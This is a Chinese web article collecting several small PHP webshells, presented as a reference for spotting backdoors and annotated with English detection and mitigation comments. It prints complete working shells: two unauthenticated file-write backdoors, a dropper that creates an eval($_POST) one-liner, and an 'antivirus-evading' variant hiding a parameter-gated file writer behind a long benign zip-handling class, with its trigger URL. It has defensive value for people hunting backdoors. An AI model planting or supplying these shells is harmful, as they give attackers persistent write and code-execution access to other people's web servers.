超小PHP小马小结(方便查找后门的朋友)
2015-01-24信息快讯网
本文汇总几种超小 PHP 小马(webshell)的代码,方便需要排查后门的朋友对照;在服务器上发现类似代码可以直接清除、封杀。
作者: spider

我也来个超小PHP小马:
<?php
/*
 * Malicious sample (file-write webshell), reproduced unchanged for recognition only.
 * This first PHP segment sets a gb2312 content type and, when magic quotes are on,
 * runs stripslashes() over every $_POST value.
 * The HTML form that follows posts two fields, "file" and "text"; the "file" field is
 * pre-filled with this script's own path (__FILE__, backslashes replaced by "/").
 * No authentication or access check appears anywhere in the sample.
 */
header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); ?> <form method="POST"> 保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> <br><br> <textarea name="text" COLS="70" ROWS="18" ></textarea> <br><br> <input type="submit" name="submit" value="保存"> <form> <?php
/*
 * Core of the backdoor: the path in $_POST['file'] is opened in 'wb' mode (truncating)
 * and $_POST['text'] is written into it, so both the location and the content of the
 * written file come straight from the request. All three calls are prefixed with @,
 * which hides the warnings a failed write would otherwise produce.
 * Detection: flag PHP where request data reaches the path argument of fopen() or the
 * data argument of fwrite(); scan for both the long and the short open tag, since the
 * sample uses both.
 * Mitigation (general hardening): the web server account should not be able to write
 * into directories from which PHP is executed.
 */
if(isset($_POST['file'])) { $fp = @fopen($_POST['file'],'wb'); echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; @fclose($fp); } ?>
昨晚无聊看了会 php 的教程,发现php真是相当的强大啊!顺便写了个php小马
下面直接贴代码了。。
<html> <title >By: SinCoder</title> <font color=red size=6>php小马 By:SinCoder</br></font> <?
/*
 * Malicious sample (file-write webshell), reproduced unchanged for recognition only.
 * This segment prints host details to whoever requests the page: the script's own path
 * (__FILE__), PHP_OS, the address gethostbyname() returns for $_SERVER["SERVER_NAME"],
 * and PHP_VERSION. The form that follows posts two fields, "data" and "dir".
 * The whole sample uses the short open tag, so signature scans that only look for the
 * long tag will not see its PHP segments.
 */
echo "</br>本程序的路径: ".__FILE__. "</br>服务器操作系统: ".PHP_OS. "</br>服务器IP地址: ".gethostbyname($_SERVER["SERVER_NAME"]). "</br>PHP版本: ".PHP_VERSION; ?> <form action = <? echo strrchr(__FILE__,"\\"); ?> method="post"> 要提交的数据:</br> <textarea type="text" name="data" rows="10" cols="30"> </textarea> </br> 保存路径:<input type="text" name="dir" /> </br> <input type="submit" value="提交"/> </form> </html> <?
/*
 * Core of the backdoor: exits unless both "data" and "dir" were posted; when both are
 * non-empty, opens the path in $_POST["dir"] in append mode ("a") and writes
 * $_POST["data"] to it. Path and content both come straight from the request and no
 * authentication or access check is performed.
 * Detection: request data reaching fopen()/fputs(), and a page that echoes __FILE__,
 * PHP_OS and PHP_VERSION next to an upload-style form.
 * Mitigation (general hardening): the web server account should not be able to write
 * into directories from which PHP is executed.
 */
if(!(isset($_POST["data"]) && isset($_POST["dir"]))) exit(); if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0) { $p_File=fopen($_POST["dir"],"a"); if(!$p_File) echo "写入失败!请换个目录试试!"; else echo "Ok!! "; fputs($p_File,$_POST["data"]); fclose($p_File); } else echo "请把数据填写完整!"; ?>
php一句话小马的后门
<?
/*
 * Malicious sample (dropper for a one-line eval backdoor), reproduced unchanged for
 * recognition only.
 * Pattern: fputs(fopen(...)) writes a second PHP file named jb51.php whose body hands
 * the request parameter $_POST[jb51] to eval().
 * The listing as printed has lost its string quoting, so treat it as an illustration of
 * the pattern, not as a literal signature.
 * Detection: review any PHP that writes another .php file, and any code that passes
 * $_POST / $_GET / $_REQUEST values to eval().
 */
fputs(fopen(jb51.php,w),<?eval($_POST[jb51]);?>)?>
这样访问之后,会在当前目录生成 jb51.php,内容为 <?eval($_POST[jb51]);?> 的一句话小马,密码为 jb51。排查时可在网站目录中搜索把 $_POST、$_GET 等请求参数直接交给 eval 的代码。
最新免杀php小马
<?php
/*
 * Malicious sample, reproduced unchanged for recognition only: a zip read/write helper
 * class followed by a request-driven file writer (see the end of this listing).
 * The trailing block never references the class; the page presents the sample as
 * evading antivirus, so the class presumably serves as benign-looking padding.
 * When triaging a suspicious file, read it to the end instead of judging it by the
 * first screen of code.
 */
class zip {
    // $datasec: local file records collected so far; $ctrl_dir: central directory records.
    // $eof_ctrl_dir: the bytes "PK\x05\x06" followed by four zero bytes, emitted by get_file().
    // $old_offset: length of all local records written before the next one.
    // $dirs: directory names already added, seeded with ".".
    var $datasec, $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; var $dirs = Array(".");

    // Lists the entries of the archive at $zip_name.
    // Returns 0 when the file cannot be opened; otherwise one array per central directory
    // entry with the keys filename, stored_filename, size, compressed_size, crc (upper-case
    // hex), mtime, comment, folder (1 when 'external' is 0x41FF0010 or 16), index and status.
    // NOTE(review): $ret starts as '' and is then appended to with [], which relies on
    // legacy PHP behaviour; newer PHP versions reject [] on a string - verify against the
    // target runtime. The handle opened here is never closed in this method.
    function get_List($zip_name) { $ret = ''; $zip = @fopen($zip_name, 'rb'); if(!$zip) return(0); $centd = $this->ReadCentralDir($zip,$zip_name); @rewind($zip); @fseek($zip, $centd['offset']); for ($i=0; $i<$centd['entries']; $i++) { $header = $this->ReadCentralFileHeaders($zip); $header['index'] = $i;$info['filename'] = $header['filename']; $info['stored_filename'] = $header['stored_filename']; $info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; $info['crc'] = strtoupper(dechex( $header['crc'] )); $info['mtime'] = $header['mtime']; $info['comment'] = $header['comment']; $info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; $info['index'] = $header['index'];$info['status'] = $header['status']; $ret[]=$info; unset($header); } return $ret; }

    // Adds one or more files to the archive being built.
    // $files is a single [name, data] pair or a list of such pairs (element 0 is passed to
    // add_File as the name, element 1 as the data); $compact is forwarded to add_File.
    // A directory entry is added first when dirname(name) is not yet in $this->dirs.
    // Returns an array mapping basename(name) to add_File's result; the loop stops at the
    // first falsy element of $files.
    function Add($files,$compact) { if(!is_array($files[0])) $files=Array($files); for($i=0;$files[$i];$i++){ $fn = $files[$i]; if(!in_Array(dirname($fn[0]),$this->dirs)) $this->add_Dir(dirname($fn[0])); if(basename($fn[0])) $ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact); } return $ret; }

    // Returns the archive as one string: all local records, all central directory records,
    // $eof_ctrl_dir, the central record count (written twice), the central directory
    // length, the local data length, and two trailing zero bytes.
    function get_file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . 
    "\x00\x00"; }

    // Adds a directory entry named $name (backslashes replaced by "/"): appends a local
    // record to $datasec and a central record to $ctrl_dir, updates $old_offset and
    // remembers the name in $dirs. $ext is assigned but never used.
    function add_dir($name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; $fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); $fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; $cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); $cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); $ext = "\xff\xff\xff\xff"; $cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name; $this -> ctrl_dir[] = $cdrec; $this -> old_offset = $new_offset; $this -> dirs[] = $name; }

    // Adds a file entry: $data is the content, $name the stored name (backslashes replaced
    // by "/"), $compact selects gzcompress() (default) or storing the data as-is.
    // The DOS timestamp from DosTime() is turned into four raw bytes by building a string
    // of \x escapes and passing it to eval(); the evaluated text is assembled only from the
    // hex digits of DosTime(), not from caller input. Indexing $dtime[0..7] assumes dechex()
    // produced eight digits - TODO confirm.
    // With compression on, the two leading and four trailing bytes of the gzcompress()
    // output are cut off before the data is stored.
    // Always returns true.
    function add_File($data, $name, $compact = 1) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->DosTime()); $hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1]; eval('$hexdtime = "' . $hexdtime . 
    '";'); if($compact) $fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime; else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime; $unc_len = strlen($data); $crc = crc32($data); if($compact){ $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); }else{ $zdata = $data; } $c_len=strlen($zdata); $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata; $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); if($compact) $cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00"; else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00"; $cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); $cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; return true; }

    // Packs the current local time (getdate()) into one integer: year-1980 shifted left by
    // 25, month by 21, day by 16, hours by 11, minutes by 5, plus seconds halved.
    // Dates before 1980 are clamped to 1980-01-01 00:00:00.
    function DosTime() { $timearray = getdate(); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); }

    // Extracts the whole archive $zn into directory $to.
    // Calling Extract directly has path problems, so this function first reads the entry
    // list, creates every directory entry, and only then runs Extract.
    // Directories are created and chmod-ed with $GLOBALS['cfg_dir_purview'], which is not
    // defined anywhere in this listing and is presumably supplied by the host application.
    // NOTE(review): entry names from the archive are appended to $to without any check for
    // "../" components, so an untrusted archive could create paths outside $to.
    function ExtractAll ( $zn, $to) { if(substr($to,-1)!="/") $to .= "/"; $files = $this->get_List($zn); $cn = count($files); if(is_array($files)) { for($i=0;$i<$cn;$i++) { if($files[$i]['folder']==1){ @mkdir($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); @chmod($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); } } } $this->Extract ($zn,$to); }

    // Extracts entries of archive $zn into $to. $index is one entry index or a list of
    // them; the default Array(-1) selects every entry.
    // Returns -1 when the archive cannot be opened or when an index is not an integer or
    // exceeds the entry count; otherwise an array mapping each extracted entry name to
    // ExtractFile's result. $ok is assigned but never used, and $stat is only created once
    // an entry has been extracted.
    function Extract ( $zn, $to, $index = 
    Array(-1) ) { $ok = 0; $zip = @fopen($zn,'rb'); if(!$zip) return(-1); $cdir = $this->ReadCentralDir($zip,$zn); $pos_entry = $cdir['offset']; if(!is_array($index)){ $index = array($index); } for($i=0; isset($index[$i]);$i++){ if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) return(-1); } for ($i=0; $i<$cdir['entries']; $i++) { @fseek($zip, $pos_entry); $header = $this->ReadCentralFileHeaders($zip); $header['index'] = $i; $pos_entry = ftell($zip); @rewind($zip); fseek($zip, $header['offset']); if(in_array("-1",$index)||in_array($i,$index)) $stat[$header['filename']]=$this->ExtractFile($header, $to, $zip); } fclose($zip); return $stat; }

    // Reads a 30-byte local file header at the current position of $zip, then the file
    // name and the extra field. Returns an array with filename, extra, compression, size,
    // compressed_size, crc, flag, mdate, mtime, stored_filename and status ("ok").
    // mtime is converted from the DOS date/time fields with mktime(); when either field is
    // zero, time() is used instead.
    function ReadFileHeader($zip) { $binary_data = fread($zip, 30); $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data); $header['filename'] = fread($zip, $data['filename_len']); if ($data['extra_len'] != 0) { $header['extra'] = fread($zip, $data['extra_len']); } else { $header['extra'] = ''; } $header['compression'] = $data['compression'];$header['size'] = $data['size']; $header['compressed_size'] = $data['compressed_size']; $header['crc'] = $data['crc']; $header['flag'] = $data['flag']; $header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime']; if ($header['mdate'] && $header['mtime']){ $hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5; $seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980; $month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F; $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); }else{$header['mtime'] = time();} $header['stored_filename'] = $header['filename']; $header['status'] = "ok"; return $header; }

    // Reads a 46-byte central directory record at the current position of $zip, then the
    // file name, extra field and comment whose lengths the record gives.
    // mtime is converted as in ReadFileHeader. When the file name ends with "/", 'external'
    // is overwritten with 0x41FF0010, the value the rest of the class treats as "directory".
    function ReadCentralFileHeaders($zip){ $binary_data = fread($zip, 46); $header = 
    unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); if ($header['filename_len'] != 0) $header['filename'] = fread($zip,$header['filename_len']); else $header['filename'] = ''; if ($header['extra_len'] != 0) $header['extra'] = fread($zip, $header['extra_len']); else $header['extra'] = ''; if ($header['comment_len'] != 0) $header['comment'] = fread($zip, $header['comment_len']); else $header['comment'] = ''; if ($header['mdate'] && $header['mtime']) { $hour = ($header['mtime'] & 0xF800) >> 11; $minute = ($header['mtime'] & 0x07E0) >> 5; $seconde = ($header['mtime'] & 0x001F)*2; $year = (($header['mdate'] & 0xFE00) >> 9) + 1980; $month = ($header['mdate'] & 0x01E0) >> 5; $day = $header['mdate'] & 0x001F; $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); } else { $header['mtime'] = time(); } $header['stored_filename'] = $header['filename']; $header['status'] = 'ok'; if (substr($header['filename'], -1) == '/') $header['external'] = 0x41FF0010; return $header; }

    // Locates the end-of-central-directory record: scans at most the last 277 bytes of the
    // file byte by byte for the value 0x504b0506, then unpacks the 18 bytes that follow.
    // Returns an array with comment, entries, disk_entries, offset, disk_start, size and
    // disk. unpack() is called with @, so a missing or truncated record is not reported.
    function ReadCentralDir($zip,$zip_name) { $size = filesize($zip_name); if ($size < 277) $maximum_size = $size; else $maximum_size=277; @fseek($zip, $size-$maximum_size); $pos = ftell($zip); $bytes = 0x00000000; while ($pos < $size) { $byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte); if ($bytes == 0x504b0506){ $pos++; break; } $pos++; } $data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18)); if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']); else $centd['comment'] = ''; $centd['entries'] = $data['entries']; $centd['disk_entries'] = $data['disk_entries']; $centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; $centd['size'] = $data['size']; $centd['disk'] = $data['disk']; return $centd; }

    // Writes one entry from the open archive $zip into directory $to.
    // The $header argument is discarded at once: the local header is re-read from $zip, and
    // because ReadFileHeader never sets 'external', that key is defaulted to 0 here.
    // Stored entries (compression 0) are copied in chunks of up to 2048 bytes. Any other
    // compression value is handled by writing a temporary "<name>.gz" file (10-byte gzip
    // header, the compressed bytes, then crc and size), reading it back through
    // gzopen()/gzread() into the destination, and deleting the temporary file.
    // Returns true, -1 when a destination file cannot be opened, or ends the script via
    // die() when gzopen() fails.
    // NOTE(review): the entry name read from the archive is appended to $to without any
    // check for "../" components, so an untrusted archive could write outside $to.
    function ExtractFile($header,$to,$zip) { 
    $header = $this->readfileheader($zip); $header['external'] = (!isset($header['external']) ? 0 : $header['external']); if(substr($to,-1)!="/") $to.="/"; if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']); if (!($header['external']==0x41FF0010)&&!($header['external']==16)) { if ($header['compression']==0) { $fp = @fopen($to.$header['filename'], 'wb'); if(!$fp) return(-1); $size = $header['compressed_size']; while ($size != 0) { $read_size = ($size < 2048 ? $size : 2048); $buffer = fread($zip, $read_size); $binary_data = pack('a'.$read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } fclose($fp); touch($to.$header['filename'], $header['mtime']); }else{ $fp = @fopen($to.$header['filename'].'.gz','wb'); if(!$fp) return(-1); $binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), Chr(0x00), time(), Chr(0x00), Chr(3)); fwrite($fp, $binary_data, 10); $size = $header['compressed_size']; while ($size != 0) { $read_size = ($size < 1024 ? $size : 1024); $buffer = fread($zip, $read_size); $binary_data = pack('a'.$read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } $binary_data = pack('VV', $header['crc'], $header['size']); fwrite($fp, $binary_data,8); fclose($fp); $gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress"); if(!$gzp) return(-2); $fp = @fopen($to.$header['filename'],'wb'); if(!$fp) return(-1); $size = $header['size']; while ($size != 0) { $read_size = ($size < 2048 ? 
    $size : 2048); $buffer = gzread($gzp, $read_size); $binary_data = pack('a'.$read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } fclose($fp); gzclose($gzp); touch($to.$header['filename'], $header['mtime']); @unlink($to.$header['filename'].'.gz'); }} return true; }
}
/*
 * The backdoor itself. It runs only when the query parameter zxzgcn equals "login", so a
 * request without that parameter produces no output from this block. Inside the branch:
 * a gb2312 content type is set, slashes are stripped from $_POST when magic quotes are
 * on, a form with the fields "file" and "text" is shown ("file" pre-filled with this
 * script's own path), and on submit $_POST['text'] is written to the path in
 * $_POST['file'] opened in 'wb' mode, with warnings hidden by @.
 * The parameter value is the only gate; no authentication or access check is performed.
 * Detection: request data reaching fopen()/fwrite(), and top-level code after a class
 * definition that branches on a $_GET value.
 * Mitigation (general hardening): the web server account should not be able to write
 * into directories from which PHP is executed.
 */
if($_GET['zxzgcn']=='login'){ header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); ?> <form method="POST"> save to: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> <br><br> <textarea name="text" COLS="70" ROWS="18" ></textarea> <br><br> <input type="submit" name="submit" value="save"> <form> <?php if(isset($_POST['file'])) { $fp = @fopen($_POST['file'],'wb'); echo @fwrite($fp,$_POST['text']) ? 'succed!' : 'faled!'; @fclose($fp); } } ?>
用法: xxx.php?zxzgcn=login。排查时可在访问日志中检索带有该参数的请求。